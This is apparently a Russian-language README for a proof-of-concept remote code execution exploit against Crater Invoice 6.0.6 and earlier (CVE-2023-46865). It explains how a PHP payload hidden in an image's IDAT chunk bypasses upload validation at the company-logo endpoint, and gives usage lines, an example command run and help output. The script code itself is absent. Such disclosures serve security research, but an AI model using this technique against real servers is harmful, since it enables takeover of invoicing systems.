
Crater <=6.0.6, CVE-2023-46865 RCE после аутентификации (суперадмин)
Crater <=6.0.6, CVE-2023-46865 RCE после аутентификации (суперадминистратор)
Crater Invoice уязвим к неограниченной загрузке файлов опасного типа из-за отсутствия надлежащей проверки ввода. Класс проверки Base64Mime можно обойти, встроив действительную PHP-полезную нагрузку в IDAT-чанк изображения. Пользователь с привилегиями суперадминистратора может загрузить созданную полезную нагрузку через логотип компании по адресу /api/v1/company/upload-logo.
$~ usage: python3 crater-rce.py --target TARGET --email EMAIL --password PASSWORD [--cmd CMD]
$~ python3 crater-rce.py --target http://192.168.1.1 --email [email protected] --password test1234 --cmd 'whoami'
$~ python3 crater-rce.py -h
usage: crater-rce.py [-h] --target TARGET --email EMAIL --password PASSWORD [--cmd CMD]
Crater Invoice RCE - CVE-2023-46865
options:
-h, --help show this help message and exit
--target TARGET Target URL
--email EMAIL Email
--password PASSWORD Password
--cmd CMD Command to execute
- Crater 6.0.6
- Kali 6.1.0
faisalfs10x - за помощь в разработке доказательства концепции.
Скрипт предназначен только для анализа безопасности и исследований, поэтому я не несу ответственности, если он будет использован для незаконных действий.